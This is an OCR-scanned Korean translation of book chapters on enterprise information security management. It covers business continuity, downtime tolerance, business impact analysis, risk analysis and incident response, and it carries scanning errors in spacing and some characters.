대 하여 매 일 매 시 각 들리 는 소식 은 이 피 하기전략이 절대 적 으로 필요하지 만 충분한 방어 
로는 되지 못한다는것을 보여 주고 있다. 침 입사건이 나 고장발생 시에는 이 피 하기전략에 
매달려도 별로 소용이 없다. 침입이나 가동정지를 피하기 위해 최선을 다하지만 이런 현 
상은 계속될것이다. 전자상업거래라는 위험률이 큰 세계에서 앞으로 살아 남으려면 이것 
을 알아야 할뿐아니 라 그에 대처할 준비도 있어 야 한다. 

인터네 트침 입 에 대 한 보도는 빈번하며 때 로는 충격 적 이여서 경 영 진의 관심 을 끈다. 
할수 없이 회사경연진과 정보보안담당회사들의 머리속에서 나온 가장 흔히 쓰는 대응책 
이 란 현행노력을 단순히 배가하는것뿐이다. 무서움에서 출발한 이 반응은 부분적 인 성과 
밖에 달성하지 못할것 이 다. 기 관내 에 새 로운 기 구를 설 치하여 인 터네 트범 죄 자들보다 한 
수 더 뜨러는것은 불가능할뿐이다. 

보안전략의 실패 를 가장 잘 보여 주는 계 측자료는 재 정 적지표이 다. 어 느 한 소식 통 
에 의하면 방어프로그람 및 설비에 드는 자금은 2004년까지의 2년기간에 55%로 뛰여올 
라 전국의 업 체 들에 서 197억딸라 수준에 이 를것 으로 추산되 고 있 다. 를퓨터보안예 산이 
증가하는것과 보조를 계속 유지 하는것 이 바로 콤퓨터범죄의 실질적 인 효력 이다. 콤퓨터 
범죄의 피 해 범위 와 그 회수가 얼마나 극적 으로 증가되 였는가를 콤퓨터보안연구소 ( CSI ) 와 
련방수사국 ( FBI ) 이 공동으로 작성한 최 근의 년례 조사보고서에서 도 잘 알수 있 다. 조사에 
응답한 273명 이 총 2억 6천 500만딸라의 손실을 보았다고 한다. 이 수자는 지난해에 보 
고된 1억 2천만딸라에 비해 훨 씬 증가한것 이 다. 

조사결과가 그 현상에 대한 절대적인 척도로는 될수 없지만 굉장히 증가하였다는 보 
안지출도 50%계선에 있으며 콤퓨터관련범죄로 입은 년간물질적손실액이 이 보안지출액 
보다 훨씬 더 많다는것을 생각하면 소름이 끼친다. 

늘어 나는 범 죄 적 손실 의 뒤 꽁무니 를 따라 가는 보안에 드는 막대한 비 용을 종합적으 
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로 보면 전자상업거래의 장래는 어둡게만 보인다. 보안상 위협에 대하여 적극적인 대책 
을 강구하지 않으면 보안관리의 무질서로 하여 정상이던 회사들이 몰락하게 될것이다. 
해커의 공격을 당하지 않고 피할수 있는 회사들은 엄청난 보호비용에 마침내는 굴복할수 
도 있을것이다. 


일반상식 


누가 소들들 ■아 주었는가 

1990년대 정보보안관리를 맡은 사람들속에서는 보다 포괄적인 전략에 낯을 돌릴대신 
부정 적 인 보안사건의 예 방에만 몰두하는 경 향이 나타났었 다. 이 런 예 방을 중시하는데 는 
3가지 의 뚜렷 한 리유가 있 었 다. 

• 사고회복보다 사고예방에 비용이 덜 든다는것이 경험으로부터 엄은 교훈이라는 
것이다. 《소잃고 외양간 고친다》는 격언이 이것을 가장 뚜렷이 표현해 준다. 
수복작업(이 경우는 소들이 다 된다음에야 소들을 다 모아 들이는것)이 미 리 문 
에 단단히 열쇠를 잠그는것보다 훨씬 더 부담이 크다는 뜻이다. 

• 비밀성의 상실은 수복할수 없으며 따라서 그에 대한 확고한 담보도 없었다는것 
이 다. 비밀정 보의 가치평 가는 역설적 이 다. 일부종류의 기밀정 보의 총체적 가치 는 
공개 되 면 령 으로 된다. 반대 로 어떤 정 보는 일정한 상태 례하면 입 력하여 처 리 
한후 출력 도표 ( IPO ) 에 나오든가 아니 면 합쳐 지 는 경 우 그 가치 가 핑장히 뛰 여 
오른다. 이와 같은 극단한 경우가 있어 《몽땅 가져 가든지 아니면 다치지도 않 
는》심리가 작용하는 실례들이 많았다. 

• 수복기능보다 《 요새》기능(보호기능을 의미함)이 경영진에는 더 쉬운 구매로 
되 여 왔다는것 이 다. 정 보보안관련쏘프트웨어 는 언제 나 잘 팔리 지 않는다. 얼 마 
도움도 안되고 또 원래 값이 비싸다. 현실적인 방법 즉 우발적인 사건들이 어떠 
어 떠하니 보안체 계는 이것 을 피 하라는식의 방법 으로는 그 매상고를 늘이지 못할 
것 이 다. 

첫 론거가 비슷하다. 피한다는것은 결국 일이 저질러 진후에 그것을 수습하는 
것보다 비용이 적다. 리론상으로 볼 때 더 좋고 새로운 방어장치 및 프로그람을 갖 
다놓고 더 령리 하고 숙련 이 잘 된 일 군들을 배 치하여 그 프로그람들과 설 비 들을 감 
시하게 한다면 문제가 응당 생기지 말아야 한다. 그렇게 되자면 또한 보다 안전한 
작업장으로 되여야 한다. 그러나 콤퓨터범죄의 폭발적인 증가가 보여 주듯이 실태는 
정 반대 이 다. 

《요새》방법은 그 기대에 보답하지 못하였다. 이것은 기술이 충분치 못해서가 아니 
다. 문제는 감행된 위협의 성격에 있다. 한 기업의 정보자산을 보호할 책임을 진 보안림 
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에 있어서 항상 골치거리로 되는것은 새로운 기묘한 공격수법이 개발되는 속도이다. 이 
러한 급속한 속도의 증가요인은 세계적으로 거의 무한수의 해커들이 진행하는《자원로 
동》에 있다. 인터네트에 대한 공격은 게릴라전의 최종적인 《모범》이다. 공격들은 통일 
성이 없으며 해커대군은 무형인데다가 그 분견대들사이의 통신은 그야말로 몇초사이에 
이 루어 진다. 100%의 보호가 담보될 정 도의 전반적이 며 최 신식인 방화벽 이 나 침 입탐지 
체 계 란 없 다. 방어체계 가 최 신의 것으로 효력을 잃지 않으려 면 해 커 들에 게 기 묘한 도구를 
실행 시 키 기전에 알려 달라고 요구하는수밖에 없다. 어 처구니 없는것 으로 보이 겠지 만 실태 
가 이 정도이면 방어체계의 개발주기가 얼마나 짧은것인가를 쉽게 알수 있다. 흔히 해커 
들이 묘한 도구를 실행시키고 그 다음에야 그것이 탐지되고 또 그 다음에 결국 리해된후 
에야 그에 대한 방어체계가 겨우 만들어 지는것이다. 

콤퓨터범죄자들에 대하여 보도매체들이 상당히 매혹을 느끼지만 사실상 실지 관심을 
돌려야 할것은 그 범죄사건이 일어 난후의 《영웅전》이다. 대용량전자상업거래싸이트가 
공격받을 때 구경군들(특히 피해입을 주주들)은 그《영웅적》업적의 세부에 대해서보다 
그 싸이트가 얼마나 오래 걸려야 복구되며 다른 장애가 또 있겠는가 하는데 더 관심을 
돌린다. 우스운 일이지만 이렇게 사회적호기심이 커도 사건대응 및 수복용자금은 보안예 
산과 전자상업 거래 예 산에 서 력 사적으로 제대로 받아 본적 이 없 다. 

정보보호전략을 재검토하여 현 위기상태에 부합되게 할 때는 지금이다. 인터네트상 
에서 기업을 운영하는 기관들은 수시로 정보보호전달을 수정하여 범죄자들의 악성적인 
공격과 자연재해 기타 사고들로부터 수습대책을 세울 가능성들을 항상 고려해야 한다. 
수복작업을 위한 적절한 준비를 한다는것은 비용이 많이 를지만 기업에 절실한(시간적으 
로 절실한) 인터네트봉사형태들을 위해서는 절대적으로 필요한 사업이다. 

표 23_1에서는 정보보안방어체계의 간단한 계층 3을 제시하고 있다. 방어체계에서 
가장 중요한(또한 투자를 요하는)것들은 아래의 3가지인데 여기서 마지막 항목인 회피가 
가장 큰 부분이 다. 전자상업 거 래활동을 잘 보호하자면 기 관들의 수복문제 를 포함시 키 고 
담보와 탐지를 보강할 필요가 있다. 


표 23-1 

정보보호모형 

준 위 

실 례 

수복 

사건 대웅，재해 수복 

탐지 

침 입 탐지 

담보 

취약성분석, 기록부검열 

회피 

방화벽 , 공개열쇠 기반 (PKI) 방책，표준계도 
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또 다른 난문제인 기업지속관리 


기 업지속관리 ( BCM : Business Continuity Management ) 는 정보보안의 작은 부류로서 수 
복을 위험관리의 일차적 인 방법으로 해결하는 분야이다. 정보보안의 다른 분야들이 지금 
까지 예 방에 주력하여 왔다면 BCM 은 거 의 일 방적 인 방법 으로 수복에 초점 을 두어 왔다. 
보안이 사건후의 전략에 자기의 초점을 넓혀 나가야 한다면 영업지속은 자기의 초점을 
넓혀 사건후전략까지 다 포괄할 필요가 있다. 전자상업거래시대에 BCM 은 회피전략을 고 
안하여 기업을 효과적으로 보호할 필요가 있다. 그 리유는 시간이다. 

인터네트기 업의 사용상요구를 검 토해보면 놀라운 사실을 알게 된다. 즉 운영정지 로 
인한 만회할수 없는 손해를 봄이 없이는 수복시 간이 모자란다는것 이 다. BCM 이 지금까지 
수복전략에 의거하여 체계리용성유지를 해온것만큼 전자상업거 래 에 대한 요구로 하여 불 
피코 수복이 불가능한 선택 이 아니 겠는가 하는 생 각이 든다. 그 리 유는 최 고허 용정 지 시 
간 ( MTD : Maximum Tolerable Downtime ) 이라는 기초변수가 명백히 밝혀 준다. 

MTD 는 기업이 받은 재정적，운영적 및 명예적인 손실을 수복하기 위하여 체계를 얼 
마만한 시간동안 정지시켜야 하는가를 재는 척도이다. 

전자상업거 래는 이 MTD 를 단축하여 일부 경 우에는 령 으로 만들었다. 몇해 전에 어 느 
도매상점체계에 재해가 나서 수복날자가 며칠 걸릴번한 일이 있었다. 매일 24시간 매주 
7일간의 중단 없는 전 세 계적봉사의 도입 으로 하여 재 해를 복구할 때 가동중지시 간은 단 
몇분밖에 허 용되 지 않는다. 이 경 우에 는 어 쩔수 없 이 유일 한 수복방도인 회 피 전략에 들 
어 가는수밖에 없다. 

표 23 _1에 제시한 정 보보호모형 을 다시 참조해보면 BCM 이 보다 필요로 하는것은 
계 층구조의 마지 막 아래부분의 회 피분야에 있는 해 결대 책이 다. 이 부분의 해 결책 들을 언 
급하는것 은 이 장의 분야가 아니지 만 리용성 제 고의 실례 에 는 예 비 체 계，체 계 이 중화，고장 
퇴치，지리적으로 떨어 진 곳들에 자료를 복사해 두는 사업 등이 포함된다고 말할수 있 
다. 중시하는 점 이 달라 졌다고 하는 또 하나의 실례 는 기 업지속이 최근에 담보와 탐지 
에 더 큰 투자를 요구하고 있다는것이다. 2002년에 해커공격이 물리적인 공격으로 되는 
것과 관련하여 회사들의 Web 참가률이 떨어 질것으로 예견된다. 기업지속림들은 한때 말 
단사용자나 문의봉사소에 서 오는 전화를 받고야 체 계 고장을 알군 하였 다. 그러 나 오늘 
정교한 감시수법과 람지수법이 있음으로 하여 각 기관들에서는 공격에 신속히 대응하여 
지 속적 인 손실 을 미 리막을수 있 게 되 였 다. 

기업지속림구성도 역시 이러한 새로운 현실이 반영되게끔 변화시켜야 할 필요가 있 
을것이다. 10년전에는 영업지속전략이 대체로 주제를 다루는 전문가들이나 전문적인 기 
업 지 속계 획 작성자들의 전공분야에 지 나지 않았다. 2000년 2월 에 있은 분산형봉사거 부공 
격 으로 하여 방화벽전문가，경 로기 조종자，사건관리전문가들로 무어 진 특별 림 들이 우후 
죽순처 럼 생겨 났다. 이 림들은 기 업 지속성 에서 문제 로 되 는것 은 무엇 인가에 대 하여 의 
견을 모았는데 그것은 체계리용성의 상실이 였다. 
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기업의 방어체계를 재정비하여 


1990년대 중엽 까지만 돌이켜 보아도 정 보위 험 관리 에 서 큰 문제 가 없 어 상당한 진보 
가 이룩되고 있었던것으로 생각된다. 기업들의 보안에 대한 위협은 앞으로 분명히 있을 
것 이 라는것을 예상하였으나 당시 에 는 기술적발전이 이 것을 꼭 제 약할것 으로 모두 믿 었다. 
그런데 유선분야에서 비안전성 이 있어 정 보보호를 엄격 히 통제해 야 되겠다는 귀 에 거슬 
리는 소리로 하여 우리는 현실에 눈을 크게 뜨게 되였다. 파도처럼 계속 밀려 드는 악착 
한 공격 과 그칠새 없는 영 업중지 를 보면 아마 오랜 기 간이 지 나야 다시 안심할수 있겠 다 
는 생각을 하게 된다. 그러나 용기를 잃지 말아야 한다. 모두가 경각성을 높인데다가 현 
위 험상태를 엄밀히 분석해 보면 우리는 앞으로 힘 있게 전진할수 있다고 보아 진다. 그 
러 나 명 백한것 은 지난 몇해 동안 리용하여 기 반이 든든하지 못한 곡 같은 전 략을 계 속 추 
구한다면 그 어느 기관이든지 자기들의 기업환경에 대한 보호를 어느때 가도 갱신하지 
못한다는것 이 다. 전자상업거래시대 에 우뚝 솟아 오르려면 진지들을 검 토하며 낡은 전략들 
을 버려야 할것이다. 

기 업의 방어체계 에 대 한 재정 비 에서 중요한것은 재설 치 가 아니 라 재 고려라는 사실 이 
우리 로 하여금 큰 고무를 받게 한다. 

필요한 대 부분의 기 술들은 이 미 기 업 들이 가지 고 있거 나 쉽 게 구입할수 있 다. 기 관 
들의 방어 전 략의 검 토를 건의하는데 서 4가지 주요분야에 대 한 분석 이 필 수적 이 다. 아래 
에 그 4가지 를 제 시 하였 다. 

보안구조 

기 관의 보안구조를 정 확히 구축하려 면 기 관의 기 본업 무기 능들에 대 한 전면적 인 리해 
가 필요하다. 이 에 대 하여 리해를 하려 면 기 관내의 업 무일군들과 담화를 하는것 이 가장 
좋다. 업무기능들을 료해한 다음 그 기본기능들을 정보기술봉사형태들과 련결시킨다. 이 
것들은 또 외부의 공격，간첩행위，체계가동정지로부터 보호해야 한다. 

정보보안봉사와 정보보안체계에 대한 보호는 보안실천과 보안대책을 실행하여야만 
달성 된다. 그러 므로 보안구조의 연구결 과는 정 보보안그룹의 활동을 회 사의 기 본업 무와 
련결 시켜 보아야 한다. 

보안구조의 연구결과들은 인터네 트에 최 근에 뛰 여 든 기 업 들에 있어서 절실 한 계 몽 
사업 이다. 기업들은 보안공정들과 장치들을 가지고 있어 2차적인 중요성을 띠는 분야들 
은 보호하고 있지만 새로운 분야 즉 기업에 사활적인 분야들은 보호 없이 그 운영이 진 
행 되 고 있 다. 효과적 인 보안구조모형 을 작성하면 보호가 가장 필요한 그 분야들에 충분 
한 자원을 집중할수 있게 된다. 

보안구조연구의 결과가 가지는 또 하나의 보충적인 우점은 그의 교량적기능에 있다. 
보안구조는 정 보보안과 그가 보호하는 영 업기능들사이의 관계 를 세밀히 추적분석하여 정 
보보안이 기업에 얼마나 큰 가치를 가지는가를 제시해 준다. 그로부터 오는 새로운 가치 
있는 안목으로 하여 예 산작성 에 서 명 확한 요구를 제 기할수 있을것 이 다. 
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기업영향분석 


기업 영향분석 ( BIA : Business Impact Analysis ) 은 지금까지 몇 해동안 기업지 속계획작성 
에 서 하나의 핵 심 분야로 리용되 여 왔다. BIA 는 그 어 떤 체 계의 단위 시 간동안 가동정 지 의 
비 용을 추산한다. 이 비 용을 추산해 내 면(례하면 하루 10만딸라) 체 계 보호와 관련한 과학 
적인 결심이 마련된다. 이 정보는 이렇게 쓰이는 외에도 있을수 있는 가동정지비용에 대 
하여 회 사측에 서 보호대 책용지 출에 인차 응해 나서 도록 하는 결심채 택 보조수단으로도 쓰 
인다. 

극히 최 근까지 만도 BIA 는 기 업 지 속계 획 작성자들에 게 만 쓰이 는 하나의 도구였 다. 전 
자상업거 래리용에 대 한 악질적 인 공격들이 점 차 손해를 많이 주는 형 태의 콤퓨터범죄 로 
됨 에 따라 BIA 는 점 점 더 광범 위한 관심 을 모으고 있 다. 

전자상업거 래체계 에서 기업영향분석을 하는것과 관련하여서는 두가지 문제 점 들이 강 
조되여 야 한다. 

첫째로， MTD 가 령으로 접근하게 되면 기 업영향의 잠재성은 절대와 무한으로 되 여 
점근선과 매우 류사하게 될것 이 다. 여 기서 그 체계의 실지작용에 대 한 리해를 정 립할수 
있다. 인터네트에 련결된 너무나도 많은 체계들이 증권거래 같은 실시간활동을 주관하고 
있으므로 그 어떤 체계의 가동정지의 영향은 즉시에 파국적인 후과를 빚어 낼수 있다. 
이전에 보다 완화된 수복조건을 제공하던 호스트체계인 백오피스 ( back - office ) 에서도 사정 
은 마찬가지 이 다. 실 시 간인 터네 트영 업모형 으로 이 행한것 과 관련 하여 매 주 7일 간 매 일 24 
시간요구사항은 낡은것으로 될지도 모른다. 그로 하여 난관이 제기되면 그 기업이 일정 
한 가동환경상에서만 영업을 할수 있게 하는 능력과 관련한 결정들이 생겨 날수도 있을 
것 이 다. 
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한 은행의 총 거래대역이 분기당으로 100만딸라단위 
로 표기됨. 4개형래의 거래를 합하여 총액을 산출함. 

소득흐름이 원천마다 다르므로 매 분야에서 고장난 
체계 가 은행 에 주는 물질적영 향은 그 변화에 비례하 
여 증가 또는 감소되 여 야 한다. 그러므로 BIA 에서 쓰 
는 수자들은 변화를 고려하여 가져 다 써 야 한다. 



그림 23-1. 시기별 은행업무봉사 



둘째 로， BIA 가 여 러개의 소득흐름을 잠재 적 손실 리윤의 원천으로 사용하기 때 문에 영 
업 이 인터네 트로 이 행 함에 따라 자주 갱 신해 줄 필요가 있다. 즉 실례 로 전화쎈터 를 인 
터네트를 리용한것으로 바꾸러는 회사는 중요성이 적어지는 전화쎈터에 미치는 영향을 
고려해 보아야 한다는것 이 다. 이 렇게 하려면 BIA 를 항상 시 간갱 신하든가 아니 면 예상곡 
선을 리용하여 미 래의 수치들을 외삽해 야 한다. 직 결봉사로 넘어 가는 한 은행의 실례 가 
그림 23 — 1에 주어 져 있다. 

BIA 결과값들을 보면 예상되는 위험이 구체적인 도달점 즉 얼마만한 자금지출을 요 
구하겠는가 하는것 이 도출된 다. 보안구조검 토에 서 와 마찬가지 로 로출된 정 보는 하나의 
매 우 강력한 도구가 있 다는것 을 우리 에 게 암시해 준다. 자원을 확보하여 기 업 관리 에 절 
실한 체계 나 공정을 보호하는것은 가동정지비용이 계산되 여 경 영 진에 제출되게 될 때만 
이 훨씬 쉬 워 질것 이다. 

우 I 험분석 

위 험분석 에서는 개 별적 인 위 험 요소들을 일정한 체계 나 공정 으로 갈라서 등급을 매겨 
놓는다. 지난 시기에 정량적인 위험분석은 시간이 매우 많이 들고 정확성도 상당히 부족 
하였 다. 전자상업 거 래 분야에서 는 위 험분석 이 신속하게 결정 되 여 야 효과가 있 다. 시 장실현 
목적 과 생산이 신속히 변화되 여 리윤성을 최대 로 높여 야 하는 산업분야에서는 위 험분석 
이 위 험 상태 를 피 하는데 서 관건적역 할을 한다. 솔직한 관찰과 가공하지 않은 제 안들을 
내놓음으로써만 위협을 피하고 대처하기 위한 전략을 세울수 있게 된다. 

촉진적 위 험분석 이 라는 방법 (를퓨터 보안연구소에 서 개 발한)을 쓰면 불필 요한 세 부에 
빠져 드는 경 향을 피 하고 위험 을 직선적 으로 빨리 확정해 낼수 있다. 이 방법 을 사용할 
때 촉진자는 대체로 6~12명으로 구성된 작은 그룹을 지도하여 해당 체계에 대한 위험들 
에 대 하여 성 원들의 인상을 불러 일 으키 는 식 으로 여 러 가지 질 문들을 제 기하여 대 답을 
받는다. 리상적으로는 그룹이 서로 다른 부류의 사람들로 구성되여 그 체계에 대한 독특 
한 자기 식 의 견해 를 가지 면 더 욱 좋다. 매 사람들이 진행하는 평 가가 실시 간적 으로 동등 
검토로 되는것으로 하여 이 과정은 집단인터뷰와 자못 류사하다. 여기서 나온 결론은 체 
계의 주요위험요소들과 그 요소들을 약화시키기 위한 여 러가지 통제대책안 등으로 종합 
되게 된다. 

하나의 과정 으로 볼 때 이 촉진적위 험분석 은 상당히 가벼 운 공정 으로서 해 당 그롭에 
지나친 부담을 주지 않으면서도 필요할 때마다 자주 반복할수도 있다. 정보보안관리를 
잘하는것은 기 업의 정 보에 주는 위 험요소들을 현실적 으로 그때 그때 분석하는데 달려 있 
다. 또한 정보보안림의 사명이 고객의 기대에 어긋나지 않도륵 담보하는 하나의 주요한 
방도로도 될것이다. 

사건대응 

20년전에는 사건대응이 순수 재해복구와 기업(물리적)의 보안분야에서만 언급되였다. 
큰 체 계 사고였 을 때 에 는 복구림 이 구체 적 인 공식 계 획 을 작성 하여 정 보자산을 복구하였 다. 
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사고의 리유가 의심되면 수사관을 채용하여 그것을 수사하군 하였다. 

의뢰기 및 봉사기망과 개인용콤퓨터망들이 출현하여 무수한 취약점들이 산생됨으로 
써 내부망과 호스트를 보호하기 위한 예방적인 대책들을 취하지 않으면 안되였다. 정보 
보안공장들이 새 기술의 물결을 타고 앞으로 질주하게 되였으므로 회피는 여전히 좋은 
전략으로 되였다. 그러나 비상복구가 새로운 현실로 자기 모습을 드러내였다. 사실 대부 
분의 기관들은 오늘날 끔찍이도 소란을 피우며 사고복구를 하고 있는것이다. 

오늘 대부분의 공장들에서는 사건대응이 정보보안에서 가장 약한 고리로 된다. 사건 
복구는 기관의 정보체계 에서의 무계 획적 인 부정적 사건을 람지 하고 대응하는 능력 이 다. 

대부분의 회사들은 회피에 대한 믿음이 확고하지 못한것으로 하여 사건대응준비가 
비참할 정도로 미약하다. 믿음직한 망의 주위에 난공불락의 성벽을 쌓는 현상이 지난 10 
년간 너무나도 만연되여 사람들은 콤퓨터범죄를 발견하고 그 후과를 회복하는데 비용을 
쏟는것이 경솔한 자금랑비라고 생각하게 되였다. 이것은 《 타이태니크》호의 려객들 절 
반에게만 구명정을 보내는것과 갈은 천진성과 기술적신뢰가 결합된 심리에 기인된다. 

대부분의 회사들에서 사건대응능력이 놀라울 정도로 없는 현상은 콤퓨터범죄의 한부 
분인 내부범죄를 놓고 볼 때 더욱 두렷해 진다. 를퓨터보안연구소와 련방수사국이 공동 
으로 진행한 콤퓨터범죄조사보고서는 지난 몇해동안 콤퓨터범죄가 얼마 변하지 않았다는 
것을 놀랍게 보여 주고 있다. 보고서를 보면 거기에서 밝혀 진 사건의 약 70%가 회사 
내 부사람들이 감행한것 이 라는것 을 알수 있 다. 그 수자들이 과장되 였 다 할지 라도 탐지 및 
대 응능력 은 상당히 제 고할 필요가 있 다. 이 경 우들에 범 죄 자들은 방화벽의 《 안온한》쪽 
에서 발견되였다. 

이러한 위험들이 억제되지 못한것은 최근에 인터네트보안에 드는 비용이 상당히 증 
가된데 있으며 이 위험들을 제거하자면 탐지하고 대응할수 있는 전문기술문제가 해결되 
여 야 한다. 

사건대응은 정보보안이라는 격납고에 핵심적인 요소를 하나 제공하게 되는바 이것이 
바로 한 그룹을 무어 복잡한 정황을 분석하고 대응대책을 강구케 하는 조직적능력이다. 
운영 을 잘하면 사건대 응계 획 으로 하여 기관전체 가 재 해 에서 구원될수도 있다. 그러한 림 
은 각이한 분야의 전문가들 즉 법 전문가，망전문가，보안전문가，선전분야의 전문가들을 
망라하면 더 좋을것이다. 그리고 기관에서 그 림에 정기적으로 훈련을 줄 필요도 있다. 

결 론 


정보보안제품들과 봉사에 대 한 요구가 끝없이 높아 지 고 있지만 콤퓨터범죄 로 
인한 총 손실액은 보안지출을 릉가하고 있는것으로 보인다. 이것은 보안전략을 철저 
히 재 검 토할것 을 촉구하고 있다. 그런데 회 사들의 정 보보안관리 자들은 보안용지 출을 
더 높여 더 강한 울타리를 구축하려고 헛되이 시도하는것으로 생각된다. 최근년간의 
경험으로 보아 이 계획에 대하여 지나치게 락관적인 태도를 취할 필요는 거의 없다 
고 본다. 
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인터네트는 거의 모든 산업에서 거래업무공정들을 실시간적으로 주관해 나간다. 지 
금까지 회사의 기술적 및 재정적내역이 생각지 않게 공개되여 버리는 현실은 21세기 정 
보일 군이 라면 누구나 매 일 체 험하는 일 로 되 고 있 다. 정 보위 험 관리 는 한때 몇 명 안되 는 
결심채 택 자들과 보안기술자들로도 가능한것 으로 알려 졌다. 이 런 시 대는 이 미 지 나갔다. 
위험과 급변으로 가늠할수 없는 오늘의 환경에서 위험관리를 해나가려면 명철한 사고와 
넓 은 경 험적토대 가 필요하다. 이것은 정보보호를 위 해서는 특별한 대 책들을 강구할뿐아 
니 라 이 런 대책 이 실패할 경우에도 대처할수 있게 준비를 할것을 요구한다. 또한 기 업 내 
의 많은 부서 들이 참가하는것 도 적 극 장려해 야 한다. 

영 향력 있는 지위 에 있는 사람들은 보다 포괄적 인 방어체 계구축을 힘 있게 내밀 어 
주어야 할 책임을 지니고 있다. 인터네트시대에 성공의 열쇠는 다름아닌 부정적사고를 
피 하여 그런 사고를 회 복할수 있는 준비 가 된 강력한 보안기 초시 설구축에 달려 있 다. 20 
세기에 위험관리는 사건후대책(탐지와 수복)뿐아니라 사건전대책(회피와 담보)에도 관심 
을 잘 돌릴것 을 요구한다. 과업 은 아름차나 이 미 잘 리해 하고 있으면서 도 잘 리용하지 
못하였던 기술을 어떻게 적용하는가 하는데 바로 성과가 달려 있다. 
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제 2 4 장. 기업내 정보보안 


류언 이. 샤프 

기업에 있어서 정보의 가치는 아무리 과장하여도 무리가 아니다. 특히 오늘의 지식 
화된 경제에서 더욱 그렇다. 정보는 많은 기관들에 있어서 가장 귀중한 유일한 재산이라 
고도 할수 있다. 

기업의 자료자산들은 지리적견지에서 보나 경영진의 견지에서 보나 이전에 비하여 
상당히 분산되여 있다. 또한 기업의 자료를 보려는 내부사용자들의 수가 늘어 났으며 전 
통적 으로 공고하던 정보기술의 령 역 이 보다 쉽게 접근되는 경 향도 적지 않다. 

정보관리의 하나의 목적은 말단사용자 즉 고객들에게 가치가 높은 정보봉사를 제때에 
하는것 이 다. 정보는 그 시간적 리용성 에서 그리고 안전한 리용성 에 비례 하여 가치를 가진다. 

어지럼증이 날 지경으로 이러저러한 제품들과 기술들이 쓸어 나와 정보보안을 각이 
한 형태로 각이한 복잡한 환경에서 보장하여 준다고 하는 조건에서 최선의 해결책은 종 
합적인 보안틀거리를 작성하는것이다. 이 틀거리는 기업전반의 요구에 맞게 보안을 효률 
적으로 반영할것이다. 

이 장에서 언급될 문제점들은 다음과 같다. 

• 보안의 필요성 

• 보안실행의 요구조건 

• 최 량적 보안틀거 리 의 특징 

• 보안요구조건을 만족시 키 기 위 한 주요기 술적 대 안 

• 기술과 요구조건을 일치시키는 효과적인 보안틀거리의 구축 

보안의 필요성 : 회사자료들들 분석해 보며 


세계의 수많은 지역들에서 해커들의 지하망들은 인터네트상에서 전송되는 자료들을 
가로채거나 수정할수 있는 매우 정교한 도구들을 개발하여 삐젓이 공유하여 왔다. 이러 
한 도구들을 씨서 회사사무실건물이 라는 상대적으로 안전한 성벽 안에서도 자료를 엿듣고 
가로채는 현상이 나타났다. 

엿 보기 ( sniffing ), 가로채 기 ( hijacking ), 위 조하기 ( spoofing ) 에 쓰이 는 도구들은 인 터 네 트 
상에 서 공개 적 으로 구입할수 있 다. 원래 정 보의 자유로운 교환을 위하여 공개된 수단으 
로 창설된 이 인터네트는 세계 적 으로 흐르는 자료들의 흐름에 많은 사람들이 접근할수 
있는 기회를 주고 있다. 실례로 한 사람이 먼 곳에 있는 자기 친구에게 보내는 전자우편 
하나가 자기 목적지까지 도착하려면 수많은 중간《마디》들을《건너뛰기》하여야 한다. 
가는 도중 어느 지점에서나 그 전자우편의 내용이 보여 질수 있는데 특히 경쟁자，대리 
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인도 볼수 있으며 협잡을 목적으로 하는자도 그것에 접근할수 있게 된다. 

지난 몇해동안 해커들의 인터네트상에서의 공격위험은 사회에 널리 알려 지게 되였 
으며 그중 몇가지 주요해킹사건으로 하여 기업과 정부의 사업과 운영이 중단되기도 하였 
다. 사실 초기의 조사결과를 보면 모든 침입사건들중의 50%이상이 기관내부에서 일어 
날것 이라고는 하지만 해 킹사건에 대한 최근 분석에 따르면 이러한 경향이 방향이 바뀌고 
있는것으로 보인다. 이 연구자료들은 다수의 공격이 기관밖에서 오는것으로 평가하고 있 
다. 이러한 공격이 진행되여도 모르거나 보고되지 않는것이 너무 례상사로 되여 통계학 
적수치들이 그 위협의 심각성을 과소평가하고 있는지도 모른다. 

콤퓨터 보안연구소가 진행한 광범한 부분의 2,213개 의 Web 싸이 트들에 대 한 최 근의 
한 분석 결 과에 의하면 일 부 상용싸이트들중 28%가 공격 에 《 상당히 취 약한》것 으로, 
30%가 일정하게 취 약한것 으로，오직 42%만이 안전한것 으로 밝혀 졌 다. 조사한 싸이 트들 
을 6개 의 부류로 즉 은행，신용조합，미 련 방싸이트，신문，성 인싸이트，기 타로 분류하였 다. 

다른 하나의 최 근 연구에 의하면 1997년부터 1999년까지 기 간에 자료나 망관계파피 사 
건이 매해 35%이상으로 증가된것으로 회사들은 보고하고 있다. 이 연구에서 또한 기관 
들이 보고한데 의하면 매 해 25%의 금융사기행위 가 직 결상에서 감행되 였다고 한다. 내부 
사람들이 망접근을 오용한 건수는 25%이상으로 증가하여 800만딸라의 손실을 가져 왔다 
고 한다. 

이 연구자료들은 인터네트와 내부망으로 흐르는 회사자료의 비법적인 접근과 사용을 
통한 금융사기사건으로 하여 회사들이 받는 위협이 얼마나 심각한가를 보여 주고 있으며 
안전한 망환경을 보장하여야 할 필요성을 강조하고 있다. 

정보보안요구사항 

보안이 정보를 다루는 여러 준위에서 지켜야 할 사항이지만 많은 경우 보안실천에서 
는 모든 준위를 고려하지 않고 다만 특정한 문제 해 결에 만 초점 을 두고 있다. 실례 로 많 
은 기관들에서는 인증(사용자가 본인이 맞다는 확인)과 같은 문제들의 해결이나 고객자 
료기지와 갈은 구체적 인 자원보호에만 신경을 씨왔다. 이 해결방안들은 종합적으로는 사 
업 에 상당히 좋은 도움을 주는 경우도 있다. 

그러나 이 방안들은 분산분리된 부속품처럼 완전무결성이 부족할뿐아니라 사용자와 
관리대 면부가 서 로 다른것 으로 하여 사용과 유지 에 서 비 용이 많이 들수 있는것 이 다. 

그렇다면 정보관리자는 어떻게 해야 사용자들을 혼란시키지 않고 현재봉사를 지연시 
키지도 않고 또 현재예산을 깨지 않으면서도 기 업정 보자산의 손실을 가져 올수 있는 가 
능성들을 줄일수 있겠는가，대답은 간단하다. 즉 기업의 종합적인 정보보안틀거리를 구축 
해 야 한다는것 이 다. 즉 현존정 보기 술환경 과 미끈하게 결 합되 는 종합적 인 보안기 초시 설 을 
구축하고 가장 필요한 부분부터 그것을 점 진적 으로 실행해 나가야 한다는것 이 다. 

보안틀거 리 의 일 부 구체 적 인 사항들을 이 장에 서 설명하려 고 한다. 이 장에 서 는 먼 
저 효과적 인 보안틀거 리 의 일 부 요구사항들을 검 토하고 이 요구사항을 만족시 키 기 위한 
일부 기법들을 종합적으로 보려고 한다. 
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기초적인 보안기능 


